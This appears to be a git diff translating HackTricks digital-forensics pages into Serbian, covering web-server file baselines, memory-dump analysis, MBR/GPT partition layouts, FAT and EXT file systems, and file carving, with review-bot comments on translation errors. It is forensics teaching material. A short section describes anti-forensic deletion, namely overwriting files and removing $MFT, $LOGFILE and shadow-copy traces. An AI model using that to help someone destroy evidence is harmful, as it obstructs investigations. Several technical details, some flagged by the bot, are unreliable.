@@ -154,19 +137,18 @@ codesign --verify --verbose /Applications/Safari.app #Check if the signature is valid spctl --assess --verbose /Applications/Safari.app ``` +## Tehnike Detekcije -## Detection Techniques +### Stacking Fajlova -### File Stacking +Ako znate da je neka fascikla koja sadrži **fajlove** web servera **poslednji put ažurirana na neki datum**. **Proverite** **datum** kada su svi **fajlovi** na **web serveru** kreirani i modifikovani i ako je neki datum **sumnjiv**, proverite taj fajl. -If you know that some folder containing the **files** of a web server was **last updated on some date**. **Check** the **date** all the **files** in the **web server were created and modified** and if any date is **suspicious**, check that file. +### Osnovne Linije -### Baselines +Ako **fajlovi** u fascikli **ne bi trebali biti modifikovani**, možete izračunati **hash** **originalnih fajlova** iz fascikle i **uporediti** ih sa **trenutnim**. Sve što je modifikovano će biti **sumnjivo**. -If the files of a folder **shouldn't have been modified**, you can calculate the **hash** of the **original files** of the folder and **compare** them with the **current** ones. Anything modified will be **suspicious**. +### Statistička Analiza -### Statistical Analysis - -When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a web shell might be one of the most**. +Kada su informacije sačuvane u logovima, možete **proveriti statistiku kao što je koliko puta je svaki fajl web servera bio pristupljen, jer bi web shell mogao biti jedan od naj**. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/memory-dump-analysis/README.md b/src/forensics/basic-forensic-methodology/memory-dump-analysis/README.md index 0d48e3bc2..0bf2f6a4f 100644 --- a/src/forensics/basic-forensic-methodology/memory-dump-analysis/README.md 
+++ b/src/forensics/basic-forensic-methodology/memory-dump-analysis/README.md @@ -1,49 +1,37 @@ -# Memory dump analysis +# Analiza memorijskih dump-ova {{#include ../../../banners/hacktricks-training.md}} -
+## Početak -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - -## Start - -Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md). +Počnite **pretragu** za **malverom** unutar pcap-a. Koristite **alate** navedene u [**Analiza malvera**](../malware-analysis.md). ## [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md) -**Volatility is the main open-source framework for memory dump analysis**. This Python tool analyzes dumps from external sources or VMware VMs, identifying data like processes and passwords based on the dump's OS profile. It's extensible with plugins, making it highly versatile for forensic investigations. +**Volatility je glavni open-source okvir za analizu memorijskih dump-ova**. Ovaj Python alat analizira dump-ove iz spoljašnjih izvora ili VMware VM-ova, identifikujući podatke kao što su procesi i lozinke na osnovu OS profila dump-a. Proširiv je sa plugin-ovima, što ga čini veoma svestranim za forenzičke istrage. -**[Find here a cheatsheet](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)** +**[Ovde pronađite cheatsheet](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)** -## Mini dump crash report +## Izveštaj o mini dump-u -When the dump is small (just some KB, maybe a few MB) then it's probably a mini dump crash report and not a memory dump. 
+Kada je dump mali (samo nekoliko KB, možda nekoliko MB), onda je verovatno reč o izveštaju o mini dump-u, a ne o memorijskom dump-u. ![](<../../../images/image (216).png>) -If you have Visual Studio installed, you can open this file and bind some basic information like process name, architecture, exception info and modules being executed: +Ako imate instaliran Visual Studio, možete otvoriti ovu datoteku i povezati neke osnovne informacije kao što su ime procesa, arhitektura, informacije o izuzecima i moduli koji se izvršavaju: ![](<../../../images/image (217).png>) -You can also load the exception and see the decompiled instructions +Takođe možete učitati izuzetak i videti dekompilovane instrukcije ![](<../../../images/image (219).png>) ![](<../../../images/image (218) (1).png>) -Anyway, Visual Studio isn't the best tool to perform an analysis of the depth of the dump. +U svakom slučaju, Visual Studio nije najbolji alat za izvođenje analize dubine dump-a. -You should **open** it using **IDA** or **Radare** to inspection it in **depth**. +Trebalo bi da ga **otvorite** koristeći **IDA** ili **Radare** da biste ga pregledali u **dubini**. ​ -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md index 02ab3ddf6..851285db3 100644 --- a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md 
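Review bot: the rewritten opening of the memory-dump README drops both headings (`-## Početak` and `-## Start`), so `Počnite **pretragu** za **malverom** unutar pcap-a.` now sits directly under the banner include with no section heading; keep `## Početak`. The same sentence also carries over the source's `pcap-a` although this file is the memory-dump analysis page (it is the dump, not a pcap, that gets searched), which is worth fixing here or upstream. Separately, deleting the two RootedCON sponsor blocks and their `{% embed url="https://www.rootedcon.com/" %}` lines is a content change that the commit subject ("Translated [...]") does not cover; either split it into its own commit or mention it in the message.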
@@ -4,20 +4,20 @@ ## Partitions -A hard drive or an **SSD disk can contain different partitions** with the goal of separating data physically.\ -The **minimum** unit of a disk is the **sector** (normally composed of 512B). So, each partition size needs to be multiple of that size. +Hard disk ili **SSD disk može sadržati različite particije** sa ciljem fizičkog razdvajanja podataka.\ +**Minimalna** jedinica diska je **sektor** (normalno sastavljen od 512B). Tako da, veličina svake particije mora biti višekratnik te veličine. ### MBR (master Boot Record) -It's allocated in the **first sector of the disk after the 446B of the boot code**. This sector is essential to indicate to the PC what and from where a partition should be mounted.\ -It allows up to **4 partitions** (at most **just 1** can be active/**bootable**). However, if you need more partitions you can use **extended partitions**. The **final byte** of this first sector is the boot record signature **0x55AA**. Only one partition can be marked as active.\ -MBR allows **max 2.2TB**. +Dodeljuje se u **prvom sektoru diska nakon 446B boot koda**. Ovaj sektor je bitan da bi se PC-ju naznačilo šta i odakle treba montirati particiju.\ +Omogućava do **4 particije** (najviše **samo 1** može biti aktivna/**bootable**). Međutim, ako vam je potrebno više particija, možete koristiti **proširene particije**. **Zadnji bajt** ovog prvog sektora je potpis boot zapisa **0x55AA**. Samo jedna particija može biti označena kao aktivna.\ +MBR omogućava **maksimalno 2.2TB**. ![](<../../../images/image (489).png>) ![](<../../../images/image (490).png>) -From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Signature** (if Windows is used). The logical drive letter of the hard disk depends on the Windows Disk Signature. Changing this signature could prevent Windows from booting (tool: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**. 
+Od **bajtova 440 do 443** MBR-a možete pronaći **Windows Disk Signature** (ako se koristi Windows). Logičko slovo diska hard diska zavisi od Windows Disk Signature. Promena ovog potpisa može sprečiti Windows da se pokrene (alat: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**. ![](<../../../images/image (493).png>) 
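Review bot: `**Zadnji bajt** ovog prvog sektora je potpis boot zapisa **0x55AA**` keeps the source's "final byte", but 0x55AA is a two-byte signature at offsets 510-511 (the MBR layout table in the next hunk lists it as `510 (0x1FE) | 2 (0x2)`); `poslednja dva bajta` is correct. Also `Dodeljuje se u **prvom sektoru diska nakon 446B boot koda**` reads as if the MBR itself came after the boot code, whereas the partition table follows the 446 bytes of boot code inside the first sector; `Nalazi se u prvom sektoru diska, nakon 446B boot koda` is clearer and matches the offset table below.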
@@ -26,122 +26,120 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig | Offset | Length | Item | | ----------- | ---------- | ------------------- | | 0 (0x00) | 446(0x1BE) | Boot code | -| 446 (0x1BE) | 16 (0x10) | First Partition | -| 462 (0x1CE) | 16 (0x10) | Second Partition | -| 478 (0x1DE) | 16 (0x10) | Third Partition | -| 494 (0x1EE) | 16 (0x10) | Fourth Partition | -| 510 (0x1FE) | 2 (0x2) | Signature 0x55 0xAA | +| 446 (0x1BE) | 16 (0x10) | Prva particija | +| 462 (0x1CE) | 16 (0x10) | Druga particija | +| 478 (0x1DE) | 16 (0x10) | Treća particija | +| 494 (0x1EE) | 16 (0x10) | Četvrta particija | +| 510 (0x1FE) | 2 (0x2) | Potpis 0x55 0xAA | -**Partition Record Format** +**Format zapisa particije** | Offset | Length | Item | | --------- | -------- | ------------------------------------------------------ | -| 0 (0x00) | 1 (0x01) | Active flag (0x80 = bootable) | -| 1 (0x01) | 1 (0x01) | Start head | -| 2 (0x02) | 1 (0x01) | Start sector (bits 0-5); upper bits of cylinder (6- 7) | -| 3 (0x03) | 1 (0x01) | Start cylinder lowest 8 bits | -| 4 (0x04) | 1 (0x01) | Partition type code (0x83 = Linux) | -| 5 (0x05) | 1 (0x01) | End head | -| 6 (0x06) | 1 (0x01) | End sector (bits 0-5); upper bits of cylinder (6- 7) | -| 7 (0x07) | 1 (0x01) | End cylinder lowest 8 bits | -| 8 (0x08) | 4 (0x04) | Sectors preceding partition (little endian) | -| 12 (0x0C) | 4 (0x04) | Sectors in partition | +| 0 (0x00) | 1 (0x01) | Aktivna zastavica (0x80 = bootable) | +| 1 (0x01) | 1 (0x01) | Početna glava | +| 2 (0x02) | 1 (0x01) | Početni sektor (bitovi 0-5); gornji bitovi cilindra (6- 7) | +| 3 (0x03) | 1 (0x01) | Početni cilindar najniži 8 bitova | +| 4 (0x04) | 1 (0x01) | Kod tipa particije (0x83 = Linux) | +| 5 (0x05) | 1 (0x01) | Krajnja glava | +| 6 (0x06) | 1 (0x01) | Krajnji sektor (bitovi 0-5); gornji bitovi cilindra (6- 7) | +| 7 (0x07) | 1 (0x01) | Krajnji cilindar najniži 8 bitova | +| 8 (0x08) | 4 (0x04) | Sektori koji prethode 
particiji (little endian) | +| 12 (0x0C) | 4 (0x04) | Sektori u particiji | -In order to mount an MBR in Linux you first need to get the start offset (you can use `fdisk` and the `p` command) +Da biste montirali MBR u Linuxu, prvo morate dobiti početni offset (možete koristiti `fdisk` i komandu `p`) -![](<../../../images/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>) - -And then use the following code +![](<../../../images/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>) +I zatim koristite sledeći kod ```bash #Mount MBR in Linux mount -o ro,loop,offset= #63x512 = 32256Bytes mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/ ``` +**LBA (Logičko adresiranje blokova)** -**LBA (Logical block addressing)** +**Logičko adresiranje blokova** (**LBA**) je uobičajen sistem koji se koristi za **određivanje lokacije blokova** podataka koji se čuvaju na uređajima za skladištenje računara, obično na sekundarnim sistemima skladištenja kao što su hard diskovi. LBA je posebno jednostavan linearni sistem adresiranja; **blokovi se lociraju pomoću celobrojnog indeksa**, pri čemu je prvi blok LBA 0, drugi LBA 1, i tako dalje. -**Logical block addressing** (**LBA**) is a common scheme used for **specifying the location of blocks** of data stored on computer storage devices, generally secondary storage systems such as hard disk drives. LBA is a particularly simple linear addressing scheme; **blocks are located by an integer index**, with the first block being LBA 0, the second LBA 1, and so on. 
+### GPT (GUID tabela particija) -### GPT (GUID Partition Table) +GUID tabela particija, poznata kao GPT, favorizovana je zbog svojih poboljšanih mogućnosti u poređenju sa MBR (Master Boot Record). Karakteristična po svom **globalno jedinstvenom identifikatoru** za particije, GPT se izdvaja na nekoliko načina: -The GUID Partition Table, known as GPT, is favored for its enhanced capabilities compared to MBR (Master Boot Record). Distinctive for its **globally unique identifier** for partitions, GPT stands out in several ways: +- **Lokacija i veličina**: I GPT i MBR počinju na **sektoru 0**. Međutim, GPT radi na **64bita**, u kontrastu sa MBR-ovih 32bita. +- **Ograničenja particija**: GPT podržava do **128 particija** na Windows sistemima i može da primi do **9.4ZB** podataka. +- **Imena particija**: Omogućava imenovanje particija sa do 36 Unicode karaktera. -- **Location and Size**: Both GPT and MBR start at **sector 0**. However, GPT operates on **64bits**, contrasting with MBR's 32bits. -- **Partition Limits**: GPT supports up to **128 partitions** on Windows systems and accommodates up to **9.4ZB** of data. -- **Partition Names**: Offers the ability to name partitions with up to 36 Unicode characters. +**Otpornost podataka i oporavak**: -**Data Resilience and Recovery**: +- **Redundancija**: Za razliku od MBR-a, GPT ne ograničava particionisanje i podatke o pokretanju na jedno mesto. Replikuje ove podatke širom diska, poboljšavajući integritet i otpornost podataka. +- **Ciklična kontrola redundancije (CRC)**: GPT koristi CRC za osiguranje integriteta podataka. Aktivno prati oštećenje podataka, a kada se otkrije, GPT pokušava da povrati oštećene podatke iz druge lokacije na disku. -- **Redundancy**: Unlike MBR, GPT doesn't confine partitioning and boot data to a single place. It replicates this data across the disk, enhancing data integrity and resilience. -- **Cyclic Redundancy Check (CRC)**: GPT employs CRC to ensure data integrity. 
It actively monitors for data corruption, and when detected, GPT attempts to recover the corrupted data from another disk location. +**Zaštitni MBR (LBA0)**: -**Protective MBR (LBA0)**: - -- GPT maintains backward compatibility through a protective MBR. This feature resides in the legacy MBR space but is designed to prevent older MBR-based utilities from mistakenly overwriting GPT disks, hence safeguarding the data integrity on GPT-formatted disks. +- GPT održava unazad kompatibilnost kroz zaštitni MBR. Ova funkcija se nalazi u prostoru nasleđenog MBR-a, ali je dizajnirana da spreči starije MBR-bazirane alate da greškom prepisuju GPT diskove, čime se štiti integritet podataka na GPT-formatiranim diskovima. ![https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/GUID_Partition_Table_Scheme.svg/800px-GUID_Partition_Table_Scheme.svg.png](<../../../images/image (491).png>) -**Hybrid MBR (LBA 0 + GPT)** +**Hibridni MBR (LBA 0 + GPT)** -[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table) +[Sa Wikipedije](https://en.wikipedia.org/wiki/GUID_Partition_Table) -In operating systems that support **GPT-based boot through BIOS** services rather than EFI, the first sector may also still be used to store the first stage of the **bootloader** code, but **modified** to recognize **GPT** **partitions**. The bootloader in the MBR must not assume a sector size of 512 bytes. +U operativnim sistemima koji podržavaju **GPT-bazirano pokretanje putem BIOS** usluga umesto EFI, prvi sektor se takođe može koristiti za skladištenje prve faze **bootloader** koda, ali **modifikovan** da prepozna **GPT** **particije**. Bootloader u MBR-u ne sme da pretpostavlja veličinu sektora od 512 bajta. -**Partition table header (LBA 1)** +**Zaglavlje tabele particija (LBA 1)** -[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table) +[Sa Wikipedije](https://en.wikipedia.org/wiki/GUID_Partition_Table) -The partition table header defines the usable blocks on the disk. 
It also defines the number and size of the partition entries that make up the partition table (offsets 80 and 84 in the table). +Zaglavlje tabele particija definiše upotrebljive blokove na disku. Takođe definiše broj i veličinu unosa particija koji čine tabelu particija (offseti 80 i 84 u tabeli). -| Offset | Length | Contents | +| Offset | Length | Sadržaj | | --------- | -------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| 0 (0x00) | 8 bytes | Signature ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h or 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#cite_note-8)on little-endian machines) | -| 8 (0x08) | 4 bytes | Revision 1.0 (00h 00h 01h 00h) for UEFI 2.8 | -| 12 (0x0C) | 4 bytes | Header size in little endian (in bytes, usually 5Ch 00h 00h 00h or 92 bytes) | -| 16 (0x10) | 4 bytes | [CRC32](https://en.wikipedia.org/wiki/CRC32) of header (offset +0 up to header size) in little endian, with this field zeroed during calculation | -| 20 (0x14) | 4 bytes | Reserved; must be zero | -| 24 (0x18) | 8 bytes | Current LBA (location of this header copy) | -| 32 (0x20) | 8 bytes | Backup LBA (location of the other header copy) | -| 40 (0x28) | 8 bytes | First usable LBA for partitions (primary partition table last LBA + 1) | -| 48 (0x30) | 8 bytes | Last usable LBA (secondary partition table first LBA − 1) | -| 56 (0x38) | 16 bytes | Disk GUID in mixed endian | -| 72 (0x48) | 8 bytes | Starting LBA of an array of partition entries (always 2 in primary copy) | -| 80 (0x50) | 4 bytes | Number of partition entries in array | -| 84 (0x54) | 4 bytes | Size of a single partition entry (usually 80h or 128) | -| 88 (0x58) | 4 bytes | CRC32 of partition entries array in little endian | -| 92 (0x5C) | \* | Reserved; must be zeroes for the rest of the block (420 bytes for a sector size of 512 bytes; but can be more with 
larger sector sizes) | +| 0 (0x00) | 8 bajta | Potpis ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h ili 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#cite_note-8)na little-endian mašinama) | +| 8 (0x08) | 4 bajta | Revizija 1.0 (00h 00h 01h 00h) za UEFI 2.8 | +| 12 (0x0C) | 4 bajta | Veličina zaglavlja u little endian (u bajtovima, obično 5Ch 00h 00h 00h ili 92 bajta) | +| 16 (0x10) | 4 bajta | [CRC32](https://en.wikipedia.org/wiki/CRC32) zaglavlja (offset +0 do veličine zaglavlja) u little endian, sa ovim poljem nula tokom izračunavanja | +| 20 (0x14) | 4 bajta | Rezervisano; mora biti nula | +| 24 (0x18) | 8 bajta | Trenutni LBA (lokacija ove kopije zaglavlja) | +| 32 (0x20) | 8 bajta | Backup LBA (lokacija druge kopije zaglavlja) | +| 40 (0x28) | 8 bajta | Prvi upotrebljivi LBA za particije (poslednji LBA primarne tabele particija + 1) | +| 48 (0x30) | 8 bajta | Poslednji upotrebljivi LBA (prvi LBA sekundarne tabele particija − 1) | +| 56 (0x38) | 16 bajta | Disk GUID u mešovitom endian | +| 72 (0x48) | 8 bajta | Početni LBA niza unosa particija (uvek 2 u primarnoj kopiji) | +| 80 (0x50) | 4 bajta | Broj unosa particija u nizu | +| 84 (0x54) | 4 bajta | Veličina jednog unosa particije (obično 80h ili 128) | +| 88 (0x58) | 4 bajta | CRC32 niza unosa particija u little endian | +| 92 (0x5C) | \* | Rezervisano; mora biti nule za ostatak bloka (420 bajta za veličinu sektora od 512 bajta; ali može biti više sa većim veličinama sektora) | -**Partition entries (LBA 2–33)** +**Unosi particija (LBA 2–33)** -| GUID partition entry format | | | +| Format unosa GUID particije | | | | --------------------------- | -------- | ------------------------------------------------------------------------------------------------------------- | -| Offset | Length | Contents | -| 0 (0x00) | 16 bytes | [Partition type GUID](https://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs) (mixed endian) | -| 16 (0x10) | 16 bytes | Unique partition 
GUID (mixed endian) | -| 32 (0x20) | 8 bytes | First LBA ([little endian](https://en.wikipedia.org/wiki/Little_endian)) | -| 40 (0x28) | 8 bytes | Last LBA (inclusive, usually odd) | -| 48 (0x30) | 8 bytes | Attribute flags (e.g. bit 60 denotes read-only) | -| 56 (0x38) | 72 bytes | Partition name (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE code units) | +| Offset | Length | Sadržaj | +| 0 (0x00) | 16 bajta | [GUID tipa particije](https://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs) (mešovit endian) | +| 16 (0x10) | 16 bajta | Jedinstveni GUID particije (mešovit endian) | +| 32 (0x20) | 8 bajta | Prvi LBA ([little endian](https://en.wikipedia.org/wiki/Little_endian)) | +| 40 (0x28) | 8 bajta | Poslednji LBA (uključivo, obično neparan) | +| 48 (0x30) | 8 bajta | Zastavice atributa (npr. bit 60 označava samo za čitanje) | +| 56 (0x38) | 72 bajta | Ime particije (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE kodnih jedinica) | -**Partitions Types** +**Tipovi particija** ![](<../../../images/image (492).png>) -More partition types in [https://en.wikipedia.org/wiki/GUID_Partition_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table) +Više tipova particija na [https://en.wikipedia.org/wiki/GUID_Partition_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table) -### Inspecting +### Istraživanje -After mounting the forensics image with [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), you can inspect the first sector using the Windows tool [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** In the following image an **MBR** was detected on the **sector 0** and interpreted: +Nakon montiranja forenzičke slike sa [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), možete ispitati prvi sektor koristeći Windows alat [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** Na sledećoj slici je otkriven **MBR** na **sektoru 0** i interpretiran: ![](<../../../images/image (494).png>) 
-If it was a **GPT table instead of an MBR** it should appear the signature _EFI PART_ in the **sector 1** (which in the previous image is empty). +Ako je to bila **GPT tabela umesto MBR-a**, trebala bi se pojaviti oznaka _EFI PART_ u **sektoru 1** (koji je na prethodnoj slici prazan). -## File-Systems +## Sistemi datoteka -### Windows file-systems list +### Lista Windows sistema datoteka - **FAT12/16**: MSDOS, WIN95/98/NT/200 - **FAT32**: 95/2000/XP/2003/VISTA/7/8/10 
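Review bot: blank lines that separate markdown blocks were dropped in this hunk: the image line now directly precedes `+I zatim koristite sledeći kod`, and `+**LBA (Logičko adresiranje blokova)**` follows the closing code fence with no blank line, so the image and sentence render as one paragraph and the bold heading is glued to the code block; restore the blank lines (the deleted `-` lines show where they were). In the GPT header table, `8 bajta` and `16 bajta` should be `8 bajtova` and `16 bajtova` (the paucal `bajta` is only used after 2, 3 and 4, so `4 bajta` and `72 bajta` are fine), and `sa ovim poljem nula tokom izračunavanja` is missing a verb, e.g. `sa ovim poljem postavljenim na nulu tokom izračunavanja`. While this block is being touched, the unchanged first line of the bash example, `mount -o ro,loop,offset= #63x512 = 32256Bytes`, has an empty offset and no image or mount point, so it fails if pasted; it is really a comment on the line below and should be written as one.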
@@ -151,49 +149,49 @@ If it was a **GPT table instead of an MBR** it should appear the signature _EFI ### FAT -The **FAT (File Allocation Table)** file system is designed around its core component, the file allocation table, positioned at the volume's start. This system safeguards data by maintaining **two copies** of the table, ensuring data integrity even if one is corrupted. The table, along with the root folder, must be in a **fixed location**, crucial for the system's startup process. +**FAT (Tabela alokacije datoteka)** sistem datoteka je dizajniran oko svoje osnovne komponente, tabele alokacije datoteka, koja se nalazi na početku volumena. Ovaj sistem štiti podatke održavanjem **dvije kopije** tabele, osiguravajući integritet podataka čak i ako je jedna oštećena. Tabela, zajedno sa korenskim folderom, mora biti na **fiksnoj lokaciji**, što je ključno za proces pokretanja sistema. -The file system's basic unit of storage is a **cluster, usually 512B**, comprising multiple sectors. FAT has evolved through versions: +Osnovna jedinica skladištenja sistema datoteka je **klaster, obično 512B**, koji se sastoji od više sektora. FAT se razvijao kroz verzije: -- **FAT12**, supporting 12-bit cluster addresses and handling up to 4078 clusters (4084 with UNIX). -- **FAT16**, enhancing to 16-bit addresses, thereby accommodating up to 65,517 clusters. -- **FAT32**, further advancing with 32-bit addresses, allowing an impressive 268,435,456 clusters per volume. +- **FAT12**, podržava 12-bitne adrese klastera i obrađuje do 4078 klastera (4084 sa UNIX-om). +- **FAT16**, unapređuje na 16-bitne adrese, čime se omogućava do 65,517 klastera. +- **FAT32**, dodatno napreduje sa 32-bitnim adresama, omogućavajući impresivnih 268,435,456 klastera po volumenu. -A significant limitation across FAT versions is the **4GB maximum file size**, imposed by the 32-bit field used for file size storage. 
+Značajno ograničenje kod FAT verzija je **maksimalna veličina datoteke od 4GB**, koju nameće 32-bitno polje korišćeno za skladištenje veličine datoteke. -Key components of the root directory, particularly for FAT12 and FAT16, include: +Ključne komponente korenskog direktorijuma, posebno za FAT12 i FAT16, uključuju: -- **File/Folder Name** (up to 8 characters) -- **Attributes** -- **Creation, Modification, and Last Access Dates** -- **FAT Table Address** (indicating the start cluster of the file) -- **File Size** +- **Ime datoteke/foldera** (do 8 karaktera) +- **Atributi** +- **Datumi kreiranja, modifikacije i poslednjeg pristupa** +- **Adresa FAT tabele** (koja označava početni klaster datoteke) +- **Veličina datoteke** ### EXT -**Ext2** is the most common file system for **not journaling** partitions (**partitions that don't change much**) like the boot partition. **Ext3/4** are **journaling** and are used usually for the **rest partitions**. +**Ext2** je najčešći sistem datoteka za **ne-journaled** particije (**particije koje se ne menjaju mnogo**) kao što je boot particija. **Ext3/4** su **journaled** i obično se koriste za **ostale particije**. -## **Metadata** +## **Metapodaci** -Some files contain metadata. This information is about the content of the file which sometimes might be interesting to an analyst as depending on the file type, it might have information like: +Neke datoteke sadrže metapodatke. 
Ove informacije se odnose na sadržaj datoteke koji ponekad može biti zanimljiv analitičaru jer, u zavisnosti od tipa datoteke, može sadržati informacije kao što su: -- Title -- MS Office Version used -- Author -- Dates of creation and last modification -- Model of the camera -- GPS coordinates -- Image information +- Naslov +- Verzija MS Office-a koja se koristi +- Autor +- Datumi kreiranja i poslednje modifikacije +- Model kamere +- GPS koordinate +- Informacije o slici -You can use tools like [**exiftool**](https://exiftool.org) and [**Metadiver**](https://www.easymetadata.com/metadiver-2/) to get the metadata of a file. +Možete koristiti alate kao što su [**exiftool**](https://exiftool.org) i [**Metadiver**](https://www.easymetadata.com/metadiver-2/) da dobijete metapodatke datoteke. -## **Deleted Files Recovery** +## **Oporavak obrisanih datoteka** -### Logged Deleted Files +### Zabeležene obrisane datoteke -As was seen before there are several places where the file is still saved after it was "deleted". This is because usually the deletion of a file from a file system just marks it as deleted but the data isn't touched. Then, it's possible to inspect the registries of the files (like the MFT) and find the deleted files. +Kao što je ranije viđeno, postoji nekoliko mesta gde je datoteka još uvek sačuvana nakon što je "obrisana". To je zato što obično brisanje datoteke iz sistema datoteka samo označava da je obrisana, ali podaci nisu dodirnuti. Tada je moguće ispitati registre datoteka (kao što je MFT) i pronaći obrisane datoteke. -Also, the OS usually saves a lot of information about file system changes and backups, so it's possible to try to use them to recover the file or as much information as possible. +Takođe, OS obično čuva mnogo informacija o promenama u sistemu datoteka i rezervnim kopijama, tako da je moguće pokušati koristiti ih za oporavak datoteke ili što više informacija. {{#ref}} file-data-carving-recovery-tools.md 
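Review bot: `dvije kopije` is ijekavian while the rest of the translation is ekavian (`ovde`, `mesto`, `nekoliko mesta`); use `dve kopije`. `65,517 klastera` and `268,435,456 klastera` keep the English thousands comma, which in Serbian reads as a decimal separator; use a dot or drop the separator. Minor: `ispitati registre datoteka (kao što je MFT)` follows the source's odd "registries", but `evidencije o datotekama` would read more naturally next to the MFT example.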
@@ -201,11 +199,11 @@ file-data-carving-recovery-tools.md ### **File Carving** -**File carving** is a technique that tries to **find files in the bulk of data**. There are 3 main ways tools like this work: **Based on file types headers and footers**, based on file types **structures** and based on the **content** itself. +**File carving** je tehnika koja pokušava da **pronađe datoteke u masi podataka**. Postoje 3 glavna načina na koje alati poput ovog funkcionišu: **Na osnovu zaglavlja i podnožja tipova datoteka**, na osnovu **struktura** tipova datoteka i na osnovu **sadržaja** same datoteke. -Note that this technique **doesn't work to retrieve fragmented files**. If a file **isn't stored in contiguous sectors**, then this technique won't be able to find it or at least part of it. +Napomena da ova tehnika **ne funkcioniše za vraćanje fragmentisanih datoteka**. Ako datoteka **nije smeštena u kontiguitetne sektore**, tada ova tehnika neće moći da je pronađe ili barem deo nje. -There are several tools that you can use for file Carving indicating the file types you want to search for +Postoji nekoliko alata koje možete koristiti za file carving koji označavaju tipove datoteka koje želite da pretražujete. {{#ref}} file-data-carving-recovery-tools.md 
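Review bot: `Postoji nekoliko alata koje možete koristiti za file carving koji označavaju tipove datoteka koje želite da pretražujete.` inverts the source: in "indicating the file types you want to search for" it is the user who tells the tool which types to carve, so write e.g. `... za file carving, kojima navodite tipove datoteka koje želite da tražite`. Also `Napomena da ova tehnika` is not a sentence (`Imajte na umu da ova tehnika ...`), and `kontiguitetne sektore` is a calque of "contiguous"; `uzastopne sektore` is the usual term.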
@@ -213,24 +211,24 @@ file-data-carving-recovery-tools.md ### Data Stream **C**arving -Data Stream Carving is similar to File Carving but **instead of looking for complete files, it looks for interesting fragments** of information.\ -For example, instead of looking for a complete file containing logged URLs, this technique will search for URLs. +Data Stream Carving je sličan File Carving-u, ali **umesto da traži kompletne datoteke, traži zanimljive fragmente** informacija.\ +Na primer, umesto da traži kompletnu datoteku koja sadrži zabeležene URL-ove, ova tehnika će tražiti URL-ove. {{#ref}} file-data-carving-recovery-tools.md {{#endref}} -### Secure Deletion +### Sigurno brisanje -Obviously, there are ways to **"securely" delete files and part of logs about them**. For example, it's possible to **overwrite the content** of a file with junk data several times, and then **remove** the **logs** from the **$MFT** and **$LOGFILE** about the file, and **remove the Volume Shadow Copies**.\ -You may notice that even performing that action there might be **other parts where the existence of the file is still logged**, and that's true and part of the forensics professional job is to find them. +Očigledno, postoje načini da se **"sigurno" obrišu datoteke i deo logova o njima**. Na primer, moguće je **prepisati sadržaj** datoteke sa smešnim podacima nekoliko puta, a zatim **ukloniti** **logove** iz **$MFT** i **$LOGFILE** o datoteci, i **ukloniti kopije senki volumena**.\ +Možda ćete primetiti da čak i kada se ta akcija izvrši, može postojati **drugi delovi gde je postojanje datoteke još uvek zabeleženo**, i to je tačno, a deo posla forenzičkog stručnjaka je da ih pronađe. 
